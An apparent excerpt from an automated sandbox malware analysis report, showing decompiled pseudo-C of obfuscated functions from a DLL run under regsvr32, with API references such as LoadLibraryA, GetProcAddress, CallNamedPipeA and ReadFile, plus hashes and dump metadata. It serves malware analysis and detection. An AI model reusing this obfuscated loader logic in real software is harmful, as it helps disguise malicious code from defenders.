				 *(_t262 + 0x40) = r8d;
				_t265 = _t198;
				 *(_t262 + 0x38) = r12d;
				 *(_t262 + 0x30) = r10d;
				 *(_t262 + 0x28) = r11d;
				 *(_t262 + 0x20) =  *((intOrPtr*)(_t262 + 0x78)) + 0xf39;
				E00007FFC7FFC130E2390(_t179, _t198,  *(_t262 + 0x100) + 0x1249,  *(_t262 + 0xd8) + 0x1b2d, _t265, _t268, _t274); // executed
				r8d =  *(_t262 + 0x70);
				r9d =  *(_t262 + 0xd8);
				r12d =  *(_t262 + 0x100);
				r15d =  *(_t262 + 0xe8);
				r11d =  *(_t262 + 0x7c);
				r10d =  *(_t262 + 0x88);
				if (r12d - _t276 + 0x27b2 >= 0) goto 0x130fa3c0;
				_t154 = _t274 + 0x216;
				if (r13d - _t154 >= 0) goto 0x130fa31a;
				r11d =  &(( *(_t262 + 0x108))[0x149]);
				r10d = _t265 - 0x526;
				 *(_t262 + 0x60) = _t179;
				 *(_t262 + 0x58) = r10d;
				r15d =  &(( *(_t262 + 0x108))[0x46b]);
				 *(_t262 + 0x50) = r11d;
				_t242 =  *((intOrPtr*)(_t262 + 0xd0)) + 0x44a;
				 *(_t262 + 0x48) = _t198;
				 *(_t262 + 0x40) = _t242;
				r14d =  &(r14d[0x337]);
				 *(_t262 + 0x38) = _t179;
				r9d = r9d + 0x4ca;
				 *(_t262 + 0x30) =  *((intOrPtr*)(_t262 + 0x84)) + 0x4ca;
				r8d = r8d + 0xfffffde6;
				 *(_t262 + 0x28) = r14d;
				 *(_t262 + 0x20) = r15d;
				E00007FFC7FFC130F75E0(_t179,  &(( *(_t262 + 0x108))[0x3bf]),  *(_t262 + 0xd8) + 0x66c); // executed
				goto 0x130fa47d;
				_t210 = _t198[0x40];
				if (_t210 != (_t278 + 0x1a2) * _t198[0x78]) goto 0x130fa340;
				r12d = r12d + _t159;
				_t232 = _t198[0x8a] & r9d;
				if (r13d - _t232 < 0) goto 0x130fa47d;
				if (_t198[0x24] - (r15d | _t210) <= 0) goto 0x130fa39c;
				r12d = r12d - r15d;
				 *_t198 =  *_t198 - (_t242 & 0x00002032) * 0x27ae;
				_t198[0x10] = _t198[0x10] - (_t198[0x44] - 0x000023f6 &  *_t198);
				goto 0x130fa3af;
				_t198[6] = _t198[6] ^  &(_t265[0x322]) * _t198[0x62] + _t198[0x1e];
				r13d = r13d + 2;
				if (r13d - _t232 >= 0) goto 0x130fa366;
				goto 0x130fa47d;
				if (_t198[0x86] - (_t198[0x86] - _t198[0x74] & 0x000030d5) >= 0) goto 0x130fa47d;
				r12d =  *(_t262 + 0x70);
				asm("o16 nop [eax+eax]");
				_t147 = r11w & 0xffffffff;
				 *(_t262 + 0x20) = _t198[0x4c] | 0x0000228c;
				r9d = _t154 & 0x0000ffff;
				r9d = r9d * _t147;
				r8d = _t147 * r12d * 0x30d5;
				CallNamedPipeA(_t246, _t253, ??, ??, ??);
				r11d =  *(_t262 + 0x7c);
				if (_t280 - 0x145b - (_t198[0x86] - _t198[0x74] & 0x000030d5) < 0) goto 0x130fa3f0;
				r12d =  *(_t262 + 0x100);
				return _t274 + 0xb3d;
			}


































                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f85
                                0x7ffc130f9f8a
                                0x7ffc130f9f99
                                0x7ffc130f9fa0
                                0x7ffc130f9fa7
                                0x7ffc130f9fad
                                0x7ffc130f9fb5
                                0x7ffc130f9fbc
                                0x7ffc130f9fc4
                                0x7ffc130f9fcd
                                0x7ffc130f9fd1
                                0x7ffc130f9fd8
                                0x7ffc130f9fe4
                                0x7ffc130f9fec
                                0x7ffc130f9ff0
                                0x7ffc130f9ff7
                                0x7ffc130fa005
                                0x7ffc130fa00a
                                0x7ffc130fa011
                                0x7ffc130fa019
                                0x7ffc130fa020
                                0x7ffc130fa027
                                0x7ffc130fa02f
                                0x7ffc130fa036
                                0x7ffc130fa03b
                                0x7ffc130fa041
                                0x7ffc130fa047
                                0x7ffc130fa054
                                0x7ffc130fa05e
                                0x7ffc130fa064
                                0x7ffc130fa06e
                                0x7ffc130fa074
                                0x7ffc130fa084
                                0x7ffc130fa086
                                0x7ffc130fa089
                                0x7ffc130fa08a
                                0x7ffc130fa08d
                                0x7ffc130fa090
                                0x7ffc130fa093
                                0x7ffc130fa095
                                0x7ffc130fa098
                                0x7ffc130fa09e
                                0x7ffc130fa0b3
                                0x7ffc130fa0be
                                0x7ffc130fa0c3
                                0x7ffc130fa0c8
                                0x7ffc130fa0d5
                                0x7ffc130fa0d7
                                0x7ffc130fa0d9
                                0x7ffc130fa0e1
                                0x7ffc130fa0e6
                                0x7ffc130fa0eb
                                0x7ffc130fa0f9
                                0x7ffc130fa101
                                0x7ffc130fa10f
                                0x7ffc130fa11a
                                0x7ffc130fa125
                                0x7ffc130fa12c
                                0x7ffc130fa138
                                0x7ffc130fa144
                                0x7ffc130fa14e
                                0x7ffc130fa152
                                0x7ffc130fa159
                                0x7ffc130fa15e
                                0x7ffc130fa165
                                0x7ffc130fa16a
                                0x7ffc130fa171
                                0x7ffc130fa17b
                                0x7ffc130fa182
                                0x7ffc130fa186
                                0x7ffc130fa18b
                                0x7ffc130fa190
                                0x7ffc130fa195
                                0x7ffc130fa19a
                                0x7ffc130fa1a2
                                0x7ffc130fa1a7
                                0x7ffc130fa1af
                                0x7ffc130fa1b6
                                0x7ffc130fa1bb
                                0x7ffc130fa1c9
                                0x7ffc130fa1db
                                0x7ffc130fa1ef
                                0x7ffc130fa1f6
                                0x7ffc130fa200
                                0x7ffc130fa205
                                0x7ffc130fa208
                                0x7ffc130fa20d
                                0x7ffc130fa212
                                0x7ffc130fa217
                                0x7ffc130fa21b
                                0x7ffc130fa220
                                0x7ffc130fa227
                                0x7ffc130fa22f
                                0x7ffc130fa23e
                                0x7ffc130fa24d
                                0x7ffc130fa259
                                0x7ffc130fa26b
                                0x7ffc130fa271
                                0x7ffc130fa27c
                                0x7ffc130fa289
                                0x7ffc130fa2a5
                                0x7ffc130fa2ac
                                0x7ffc130fa2b7
                                0x7ffc130fa2bc
                                0x7ffc130fa2c3
                                0x7ffc130fa2c8
                                0x7ffc130fa2ce
                                0x7ffc130fa2d9
                                0x7ffc130fa2dd
                                0x7ffc130fa2e4
                                0x7ffc130fa2e8
                                0x7ffc130fa2ef
                                0x7ffc130fa2f3
                                0x7ffc130fa2fa
                                0x7ffc130fa30b
                                0x7ffc130fa310
                                0x7ffc130fa315
                                0x7ffc130fa31a
                                0x7ffc130fa32f
                                0x7ffc130fa33d
                                0x7ffc130fa34a
                                0x7ffc130fa353
                                0x7ffc130fa369
                                0x7ffc130fa373
                                0x7ffc130fa390
                                0x7ffc130fa396
                                0x7ffc130fa39a
                                0x7ffc130fa3ab
                                0x7ffc130fa3af
                                0x7ffc130fa3b9
                                0x7ffc130fa3bb
                                0x7ffc130fa3dc
                                0x7ffc130fa3e2
                                0x7ffc130fa3ea
                                0x7ffc130fa40c
                                0x7ffc130fa41d
                                0x7ffc130fa422
                                0x7ffc130fa42a
                                0x7ffc130fa443
                                0x7ffc130fa44a
                                0x7ffc130fa45e
                                0x7ffc130fa46f
                                0x7ffc130fa475
                                0x7ffc130fa49f

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: 5162e8c7919a05a93b0b5628ffb614b8962b608f4fe67c094bdc8d360a9fccb2
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: 5162e8c7919a05a93b0b5628ffb614b8962b608f4fe67c094bdc8d360a9fccb2
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E4820 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 94%
                                			E00007FFC7FFC130E4820(void* __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				signed int _t132;
				void* _t147;
				signed int _t152;
				void* _t153;
				signed int _t159;
				signed int _t167;
				signed int _t168;
				signed int _t170;
				signed long long _t172;
				signed long long _t179;
				signed long long _t182;
				intOrPtr _t186;
				signed long long _t188;
				void* _t192;
				signed long long _t193;
				signed int _t194;
				void* _t196;
				signed int _t198;
				signed long long _t203;
				signed int _t214;
				void* _t224;
				signed long long _t225;
				signed long long _t226;
				signed long long _t228;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t248;
				void* _t249;
				long long _t250;
				void* _t252;
				void* _t254;
				signed long long _t255;
				void* _t257;
				CHAR* _t259;
				signed long long _t260;

				_t248 = __r10;
				_t247 = __r9;
				_t245 = __r8;
				_t196 = __rcx;
				 *((long long*)(_t242 + 0x10)) = __rbx;
				 *(_t242 + 0x20) = r9d;
				_push(_t232);
				_push(_t252);
				_push(_t254);
				_push(_t257);
				_t243 = _t242 - 0x80;
				_t167 =  *(_t243 + 0x100);
				r10d = __r9 - 0x3666;
				r12d =  *(_t243 + 0xf8);
				r14d = __r9 - 0x22c;
				 *(_t243 + 0xc0) = r10d;
				r8d =  *(_t243 + 0xe8);
				_t9 = _t196 - 0x27b2; // 0x0
				_t238 = _t9;
				r8d = r8d + 0xffffee57;
				 *(_t243 + 0xd0) = _t238;
				 *(_t243 + 0x68) = r8d;
				r9d = _t167 + 0x1563;
				r12d = r12d + 0x984;
				r13d = _t167 - 0x2103;
				 *(_t243 + 0xe8) = r9d;
				 *(_t243 + 0x60) = _t167;
				_t224 = __rbx + 0xf39;
				if (r9d - __r10 + 0x23f6 <= 0) goto 0x130e4ab2;
				r8d = _t257 - 0x2b1;
				r10d = r10d + 0x37e1;
				r11d = _t254 + 0x38e9;
				_t255 =  *((intOrPtr*)(_t243 + 0x118));
				_t21 = _t238 + 0x2598; // 0x2598
				_t168 = _t21;
				 *(_t243 + 0x48) = _t168;
				 *(_t243 + 0x40) = _t224 - 0x44a;
				r15d = _t257 - 0x11ae;
				 *(_t243 + 0x38) = r8d;
				_t27 = _t238 + 0x228c; // 0x228c
				r9d = _t27;
				 *(_t243 + 0x30) = r10d;
				 *(_t243 + 0x28) = r15d;
				 *(_t243 + 0x20) = r11d;
				_t132 = E00007FFC7FFC130FAA10(_t168, _t224 - 0x55e, _t255, __r8, __r9, _t259); // executed
				r8d =  *(_t243 + 0xe8);
				r10d = _t252 - 0x278;
				r12d =  *(_t243 + 0xd0);
				_t192 = _t232 - 0x22c;
				_t233 =  *(_t243 + 0x100);
				_t198 = _t192 - 0x150e;
				 *(_t243 + 0x50) = _t198;
				r14d = _t132;
				 *(_t243 + 0x48) = _t198;
				 *(_t243 + 0x40) = _t168 + 0xfffffa6f;
				r9d = _t252 + 0x27ae;
				_t170 =  *(_t243 + 0x60);
				r11d = _t233 + 0x189;
				 *(_t243 + 0x38) = _t170;
				_t239 = _t233 + 0x495;
				 *(_t243 + 0x30) = r10d;
				_t225 = _t224 - 0x145b;
				 *(_t243 + 0x28) = r11d;
				r8d = r8d + 0x283;
				 *(_t243 + 0x20) = _t255;
				 *(_t243 + 0xf8) = _t225;
				E00007FFC7FFC130E7120(_t153, _t170, _t239, _t233, __r8, __r9, _t248, _t249);
				_t234 = _t170;
				LoadLibraryA(_t259);
				r10d = _t192 + 0x2ad;
				r11d = _t252 + 0x37e1;
				 *(_t243 + 0x50) = _t239;
				_t193 = _t225 + 0x1011;
				 *(_t255 + 0x268) = _t170;
				_t58 = _t234 + 0x1270; // 0x1270
				_t226 = _t58;
				_t60 = _t257 + 0x81; // 0x81
				r8d = _t60;
				_t172 =  *(_t255 + 0x1e0) | 0x0000343a;
				_t214 =  *(_t243 + 0xf8) + 0xe49;
				 *((intOrPtr*)(_t255 + 0x120)) =  *((intOrPtr*)(_t255 + 0x120)) + _t172;
				r9d = r15d;
				 *(_t243 + 0x48) = _t172;
				 *(_t243 + 0x40) = r10d;
				 *(_t243 + 0x38) = r11d;
				 *(_t243 + 0x30) = _t193;
				 *(_t243 + 0x28) = _t226;
				 *(_t243 + 0x20) = _t255;
				E00007FFC7FFC130E2730(_t172, _t193,  *(_t243 + 0x100) + 0x16de, _t234, _t245);
				r8d =  *(_t243 + 0xd8);
				r10d =  *(_t243 + 0xc0);
				 *(_t243 + 0x48) = r8d;
				_t75 = _t257 - 0xeb4; // -3764
				r11d = _t75;
				 *(_t243 + 0x40) = _t214;
				_t77 = _t234 + 0xcdf; // 0xcdf
				r9d = _t77;
				 *(_t243 + 0x38) = _t172;
				r10d = r10d + 0x3a59;
				 *(_t243 + 0x30) = r10d;
				 *(_t243 + 0x28) = r11d;
				 *(_t243 + 0x20) = _t193;
				E00007FFC7FFC130E1000(_t172, _t193,  *(_t243 + 0x100) + 0x16de, _t234, _t255, _t247);
				goto 0x130e4c65;
				_t194 =  *((intOrPtr*)(_t243 + 0x118));
				_t260 = r12d;
				if ( *((intOrPtr*)(_t194 + 0x80)) -  *(_t194 + 0x48) * _t260 > 0) goto 0x130e4ae9;
				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
				_t203 = r10d;
				_t179 =  *((intOrPtr*)(_t194 + 0x90)) +  *((intOrPtr*)(_t194 + 0x70)) ^ _t203;
				 *(_t243 + 0x60) = _t203;
				if (_t260 - _t179 > 0) goto 0x130e4c5f;
				 *(_t243 + 0xd8) = _t214;
				_t250 = r9d * 0x36e7;
				 *((long long*)(_t243 + 0x70)) = _t250;
				 *(_t243 + 0x100) = _t179 | 0x00001f2c;
				asm("o16 nop [eax+eax]");
				r8d = r8d *  *(_t194 + 0x40);
				_t182 =  *(_t194 + 0xc8) + _t250;
				r11d =  *(_t194 + 0x1c0);
				r11d = r11d + 0x1f2c;
				_t228 = _t226 * ( *((intOrPtr*)(_t194 + 0x120)) +  *((intOrPtr*)(_t194 + 0x60))) | _t182 -  *((intOrPtr*)(_t194 + 0x110));
				 *(_t194 + 0xc8) = r13d & _t260 ^ _t182;
				 *(_t243 + 0xf8) = _t228;
				r13d = r13d | r14d;
				_t186 =  *((intOrPtr*)(_t194 + 0x218));
				r10d = _t186 +  *((intOrPtr*)(_t194 + 0x188));
				_t188 =  *(_t194 + 0x1b8) | 0x0000343a;
				_t152 = _t255 + 0x00003a59 & r14d;
				r9d =  *(_t243 + 0x100);
				 *(_t243 + 0x48) = _t188;
				r9d = r9d & _t159;
				 *(_t243 + 0x40) = _t194;
				 *(_t243 + 0x38) = r10d;
				 *(_t243 + 0x30) = r11d;
				 *(_t243 + 0x28) = _t228 &  *(_t194 + 0x150) & 0x00002032;
				 *(_t243 + 0x20) = _t234 - _t186;
				_t147 = E00007FFC7FFC130F98F0(_t152, _t188,  *(_t194 + 0x1f8) * 0x1f2c, _t255, _t247, _t255);
				r12d = r12d + 4;
				 *_t188 =  *_t188 + _t147;
				 *((intOrPtr*)(_t188 + 0x2b)) =  *((intOrPtr*)(_t188 + 0x2b)) + _t152;
				asm("retf 0x148");
				 *_t188 =  *_t188 + _t147;
				r9d =  *(_t243 + 0xe8);
				r10d =  *(_t243 + 0xc0);
				r8d =  *(_t243 + 0x68);
				if (r12d - ( *((intOrPtr*)(_t194 + 0x90)) +  *((intOrPtr*)(_t194 + 0x70)) ^  *(_t243 + 0x60)) <= 0) goto 0x130e4b40;
				goto 0x130e4c65;
				return _t147;
			}
















































                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4825
                                0x7ffc130e482b
                                0x7ffc130e482d
                                0x7ffc130e482f
                                0x7ffc130e4831
                                0x7ffc130e4835
                                0x7ffc130e483c
                                0x7ffc130e4843
                                0x7ffc130e484a
                                0x7ffc130e4852
                                0x7ffc130e485c
                                0x7ffc130e4864
                                0x7ffc130e486c
                                0x7ffc130e486c
                                0x7ffc130e4872
                                0x7ffc130e4879
                                0x7ffc130e4883
                                0x7ffc130e4888
                                0x7ffc130e488f
                                0x7ffc130e4896
                                0x7ffc130e489d
                                0x7ffc130e48ac
                                0x7ffc130e48b0
                                0x7ffc130e48b9
                                0x7ffc130e48bf
                                0x7ffc130e48c6
                                0x7ffc130e48cd
                                0x7ffc130e48d4
                                0x7ffc130e48dc
                                0x7ffc130e48dc
                                0x7ffc130e48e2
                                0x7ffc130e48ec
                                0x7ffc130e48f0
                                0x7ffc130e48f7
                                0x7ffc130e48fc
                                0x7ffc130e48fc
                                0x7ffc130e4903
                                0x7ffc130e490e
                                0x7ffc130e4919
                                0x7ffc130e491e
                                0x7ffc130e4923
                                0x7ffc130e492b
                                0x7ffc130e4933
                                0x7ffc130e493b
                                0x7ffc130e4941
                                0x7ffc130e4948
                                0x7ffc130e494e
                                0x7ffc130e4952
                                0x7ffc130e4955
                                0x7ffc130e495e
                                0x7ffc130e4962
                                0x7ffc130e496a
                                0x7ffc130e496e
                                0x7ffc130e4975
                                0x7ffc130e4979
                                0x7ffc130e497f
                                0x7ffc130e4984
                                0x7ffc130e498a
                                0x7ffc130e498f
                                0x7ffc130e4998
                                0x7ffc130e499f
                                0x7ffc130e49a6
                                0x7ffc130e49b2
                                0x7ffc130e49b4
                                0x7ffc130e49c1
                                0x7ffc130e49cf
                                0x7ffc130e49d7
                                0x7ffc130e49db
                                0x7ffc130e49e1
                                0x7ffc130e49e8
                                0x7ffc130e49e8
                                0x7ffc130e49f5
                                0x7ffc130e49f5
                                0x7ffc130e49fc
                                0x7ffc130e4a02
                                0x7ffc130e4a08
                                0x7ffc130e4a1d
                                0x7ffc130e4a20
                                0x7ffc130e4a24
                                0x7ffc130e4a29
                                0x7ffc130e4a2e
                                0x7ffc130e4a32
                                0x7ffc130e4a36
                                0x7ffc130e4a3b
                                0x7ffc130e4a40
                                0x7ffc130e4a4f
                                0x7ffc130e4a5f
                                0x7ffc130e4a64
                                0x7ffc130e4a64
                                0x7ffc130e4a6b
                                0x7ffc130e4a6f
                                0x7ffc130e4a6f
                                0x7ffc130e4a7d
                                0x7ffc130e4a81
                                0x7ffc130e4a8f
                                0x7ffc130e4a97
                                0x7ffc130e4a9c
                                0x7ffc130e4aa0
                                0x7ffc130e4aad
                                0x7ffc130e4ab2
                                0x7ffc130e4aba
                                0x7ffc130e4acc
                                0x7ffc130e4ad7
                                0x7ffc130e4af4
                                0x7ffc130e4af7
                                0x7ffc130e4afa
                                0x7ffc130e4b02
                                0x7ffc130e4b15
                                0x7ffc130e4b1c
                                0x7ffc130e4b27
                                0x7ffc130e4b2c
                                0x7ffc130e4b37
                                0x7ffc130e4b4a
                                0x7ffc130e4b4f
                                0x7ffc130e4b52
                                0x7ffc130e4b5c
                                0x7ffc130e4b72
                                0x7ffc130e4b74
                                0x7ffc130e4b85
                                0x7ffc130e4b92
                                0x7ffc130e4b95
                                0x7ffc130e4bad
                                0x7ffc130e4bb7
                                0x7ffc130e4bc6
                                0x7ffc130e4bc9
                                0x7ffc130e4bd1
                                0x7ffc130e4bd5
                                0x7ffc130e4bd8
                                0x7ffc130e4bdd
                                0x7ffc130e4be2
                                0x7ffc130e4be7
                                0x7ffc130e4beb
                                0x7ffc130e4bef
                                0x7ffc130e4bfb
                                0x7ffc130e4c0c
                                0x7ffc130e4c0e
                                0x7ffc130e4c11
                                0x7ffc130e4c17
                                0x7ffc130e4c2b
                                0x7ffc130e4c33
                                0x7ffc130e4c3b
                                0x7ffc130e4c52
                                0x7ffc130e4c5d
                                0x7ffc130e4c7f

                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00735EE8 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 642 735ee8-735f0d 643 735f28-735f2d 642->643 644 735f0f-735f20 call 73908c 642->644 646 735f48-735f4d 643->646 647 735f2f-735f40 call 73908c 643->647 644->643 655 735f22 644->655 648 735f68-735f6f 646->648 649 735f4f-735f60 call 73908c 646->649 647->646 660 735f42 647->660 653 735f71-735f76 HeapFree 648->653 654 735f7c-735f83 648->654 649->648 661 735f62 649->661 653->654 658 735f90-735f97 654->658 659 735f85-735f8a HeapFree 654->659 655->643 662 735fa4-735fab 658->662 663 735f99-735f9e HeapFree 658->663 659->658 660->646 661->648 664 735fb8-735fc7 662->664 665 735fad-735fb2 HeapFree 662->665 663->662 665->664
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 1e978a65ef2d2525a0e46a0ac37f691624cc37dfecf44c802f665f77e81a712b
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 9D213561605F9482FB29DB66EA4436D63A1EBC9FC4F5890169F0E6376ACF3CD981C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E11F0 Relevance: 4.7, APIs: 3, Instructions: 157filememoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E11F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, long long _a8, void* _a16, void* _a24, long long _a32, long long _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
				void* _v32;
				void* _v40;
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				intOrPtr _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t74;
				intOrPtr _t76;
				int _t77;
				int _t79;
				signed int _t84;
				long long _t88;
				void* _t93;
				void* _t99;
				signed long long _t113;
				long long _t118;
				long long _t123;
				long long _t124;
				signed long long _t131;
				long long _t141;
				void* _t152;
				signed long long _t160;
				void* _t165;
				long long _t172;

				_t99 = _t152;
				r11d = _a88;
				_t141 = __rdx - 0xfd2;
				_t172 = _a96;
				r11d = r11d + 0xfffff8a0;
				 *((long long*)(_t99 + 0x10)) = __rbp;
				 *((long long*)(_t99 + 0x18)) = __rsi;
				 *((long long*)(_t99 - 0x20)) = __r13;
				r13d = __rcx - 0x3a59;
				_t123 = _a40;
				 *((long long*)(_t99 - 0x28)) = __r14;
				r14d = __r8 - 0x1044;
				r8d = _a104;
				r8d = r8d + 0xffffdefd;
				_a8 = _t141;
				_a88 = r11d;
				_a104 = r8d;
				if (r8d - _t74 >= 0) goto 0x130e130e;
				 *((intOrPtr*)(_t172 + 0x98)) =  *((intOrPtr*)(_t172 + 0x368));
				r11d = __r8 + 0x329d;
				r10d = __r13 + 0x27b2;
				_v48 = r10d;
				r8d = _t123 + 0xf35;
				_v56 = _t172;
				_v64 = _t123 + 0xc88;
				_v72 = _a64 + 0xde3;
				_v80 = r11d;
				r9d = __r14 + 0xd93;
				_v88 = _t118;
				_v96 = _t141;
				_v104 = __rsi;
				_t76 = E00007FFC7FFC130F84E0(_a64 + 0xde3, _t118, __rsi, __r8, _t165, __r14); // executed
				_t124 =  *((intOrPtr*)(_t172 + 0x348));
				r8d = _t76;
				 *((long long*)(_t172 + 0x158)) = _t124;
				goto 0x130e1428;
				_a40 = _t141;
				r10d = __r13 + 0x27ae;
				_t88 = _t141;
				if (_t88 != 0) goto 0x130e142f;
				_a32 = __r12;
				r12d = _t124 + 0x2ee;
				r12d = r12d & 0x000023f6;
				asm("o16 nop [eax+eax]");
				if (_t88 == 0) goto 0x130e13c6;
				asm("o16 nop [eax+eax]");
				_t77 = ReadFile(??, ??, ??, ??, ??);
				if (__r13 + 0x3189 - ( *(_t172 + 0x220) &  *(_t172 + 0xe8)) + 0x1f2c < 0) goto 0x130e1370;
				r10d = _a40;
				r11d = _a88;
				r9d = 0;
				if (r12d > 0) goto 0x130e1406;
				_t160 =  *(_t172 + 0x1b8) ^ 0x00002598;
				if (_t160 == 0) goto 0x130e13fd;
				_t84 = r13d;
				r14d = r14d | _t84;
				if (_t77 != _t160) goto 0x130e13f0;
				r9d = r9d + 3;
				_t93 = r9d - r12d;
				if (_t93 >= 0) goto 0x130e13e0;
				r10d = r10d + 4;
				_a40 = r10d;
				if (_t93 == 0) goto 0x130e1340;
				r8d = _a104;
				if (r8d - _t77 < 0) goto 0x130e1503;
				 *(_t172 + 0x198) =  *(_t172 + 0x198) * 0x1873ac2e;
				if ( *((intOrPtr*)(_t172 + 0x158)) == 0) goto 0x130e14a9;
				_t113 =  *(_t172 + 0x1e0) | 0x000038e9;
				 *(_t172 + 0x198) = _t113;
				GetProcessHeap();
				if (_t113 == 0) goto 0x130e14a9;
				_t131 = _t113; // executed
				_t79 = HeapFree(??, ??, ??); // executed
				if (_t84 - _t131 > 0) goto 0x130e1503;
				asm("o16 nop [eax+eax]");
				 *((long long*)(_t172 + 0x228)) =  *((intOrPtr*)(_t172 + 0x228)) - 0x2598;
				if (_t84 - _t131 <= 0) goto 0x130e14e0;
				return _t79;
			}
































                                0x7ffc130e11f0
                                0x7ffc130e11fb
                                0x7ffc130e1203
                                0x7ffc130e1209
                                0x7ffc130e1211
                                0x7ffc130e1218
                                0x7ffc130e121c
                                0x7ffc130e1220
                                0x7ffc130e1224
                                0x7ffc130e122b
                                0x7ffc130e1232
                                0x7ffc130e1236
                                0x7ffc130e123d
                                0x7ffc130e1245
                                0x7ffc130e124c
                                0x7ffc130e1259
                                0x7ffc130e1261
                                0x7ffc130e126c
                                0x7ffc130e127f
                                0x7ffc130e1286
                                0x7ffc130e1294
                                0x7ffc130e129b
                                0x7ffc130e12a0
                                0x7ffc130e12a7
                                0x7ffc130e12b2
                                0x7ffc130e12c9
                                0x7ffc130e12d4
                                0x7ffc130e12d9
                                0x7ffc130e12e0
                                0x7ffc130e12eb
                                0x7ffc130e12ef
                                0x7ffc130e12f3
                                0x7ffc130e12f8
                                0x7ffc130e12ff
                                0x7ffc130e1302
                                0x7ffc130e1309
                                0x7ffc130e130e
                                0x7ffc130e1315
                                0x7ffc130e1318
                                0x7ffc130e131a
                                0x7ffc130e1320
                                0x7ffc130e1328
                                0x7ffc130e132f
                                0x7ffc130e1336
                                0x7ffc130e1356
                                0x7ffc130e1367
                                0x7ffc130e1391
                                0x7ffc130e13b4
                                0x7ffc130e13b6
                                0x7ffc130e13be
                                0x7ffc130e13c6
                                0x7ffc130e13cc
                                0x7ffc130e13d5
                                0x7ffc130e13e5
